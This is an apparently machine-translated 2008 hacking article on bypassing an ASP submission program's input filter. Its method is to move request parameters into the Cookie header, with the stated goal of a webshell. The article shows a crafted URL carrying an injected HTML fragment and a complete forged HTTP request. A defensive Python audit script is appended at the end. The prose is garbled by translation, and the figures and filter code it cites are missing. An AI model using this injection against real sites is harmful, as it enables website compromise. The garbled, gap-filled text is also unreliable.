Cracking the day discontinue ASP receiving program
  Add date: 07/21/2008   Publishing date: 07/21/2008   Hits: 4
I recently read, on the octonary number system forum, an analysis of cracking the Bole ASP receiving program, which obtains a webshell through submitted data! A friend happened to ask me to help look at the submission problem in day discontinue. The main issue is that some users of the program have defined custom functions of their own, so the original method cannot bypass those functions; but when I looked yesterday, it turned out that it can be done by another method!

First, we will not look at day discontinue's other bugs here; let's go straight to the submission process!

The submission described in the online announcement uses a link like this:

http://www.xxx.com/post.asp?act=&d00=202&d01= src= http://www.a.com >&d02=&d10=&d11=17000813&d20=&d21=&d22=&d23=&d30= day discontinue&d31=&d32=1&d33=&d40=0&d41=0&d42=0&d50=&d51=&d98=&d99=123

The response, shown in Figure 1, indicates that the data was inserted normally.



Let's look at the page that displays the submitted data and part of its source code, as shown in Figure 2.



Some programs, however, use custom functions to validate and filter the submitted data.

Here is one such piece of code:


I believe many readers have already spotted it: just as in the website systems analysed before, this custom code filters only Request.QueryString and Request.Form, and does not filter data submitted by cookie! Now let's look at how day discontinue reads its input:

strAreaName = Request("d00")   ' there are many more of these; only one is shown

….

….

If strAreaName <> "" Then RS("AreaName") = strAreaName   ' there are many more of these; only one is shown

….

….

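This is the day discontinue code without any filtering. Once the page of custom functions is added, the request variables pass through the Function CheckStr(ChkStr) filter, but one submission channel remains: the cookie! Because Request("d00") names no collection, ASP searches QueryString, Form, Cookies, ClientCertificate and ServerVariables in turn, so a value that is absent from the query string and the form is taken from the cookie. Let's look at the submission method below!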

First, capture and analyse the packets of a normal submission, then construct the data packet. I constructed the following packet (I have changed the real information here, ^_^):


GET /post.asp?act=&d00=202&d02=&d11=17000813&d20=&d21=&d22=&d23=&d30=cookie&d31=&d32=1&d33=&d40=0&d41=0&d42=0&d50=&d51=&d98=&d99=123 HTTP/1.1
Accept: */*
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: xxx.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDCATSSDRC=NAAGENEADMNBDLJJFMKLGMDO; d01=; d10=

Here we only need to put the data that is to be submitted by cookie into the Cookie header; everything else can stay unchanged!
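For auditing code against the gap described above, the following added example (not part of the original article or of the program it discusses) scans classic ASP source for unqualified Request("name") reads, which fall through to the Cookies collection, and reports whether each one is wrapped in CheckStr at the point of the read. The sample source, the variable names in it and the function names audit and strip_comment are constructed for illustration.

```python
import re

# Unqualified read: Request("x"). Classic ASP resolves it by searching
# QueryString, Form, Cookies, ClientCertificate and ServerVariables in order,
# so a filter applied only to QueryString and Form never sees a cookie value.
UNQUALIFIED = re.compile(r'\bRequest\s*\(\s*"([^"]+)"\s*\)', re.IGNORECASE)
# Read wrapped directly in the filter function named on the page.
FILTERED = re.compile(
    r'\bCheckStr\s*\(\s*Request\s*\(\s*"([^"]+)"\s*\)\s*\)', re.IGNORECASE)

def strip_comment(line):
    """Drop a VBScript ' comment, ignoring apostrophes inside string literals."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line

def audit(source):
    """Return (line_no, parameter, filtered_at_read) per unqualified read."""
    findings = []
    for no, raw in enumerate(source.splitlines(), 1):
        code = strip_comment(raw)
        filtered = {m.group(1).lower() for m in FILTERED.finditer(code)}
        for m in UNQUALIFIED.finditer(code):
            name = m.group(1)
            findings.append((no, name, name.lower() in filtered))
    return findings

# Constructed sample, modelled on the fragment quoted in the article.
SAMPLE = '''\
strAreaName = Request("d00")   ' unqualified: cookie fallback applies
strTitle = CheckStr(Request("d01"))
strCity = Request.QueryString("d10")
strNote = Request.Form("d11") ' Request("d99") appears in a comment only
If strAreaName <> "" Then RS("AreaName") = strAreaName
'''

if __name__ == "__main__":
    for no, name, filtered in audit(SAMPLE):
        state = "filtered at read" if filtered else "UNFILTERED, cookie fallback"
        print(f"line {no}: Request(\"{name}\") -> {state}")
```

Each unfiltered finding is a place to either name the collection explicitly (Request.QueryString or Request.Form) or apply the filter to the value actually read.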

 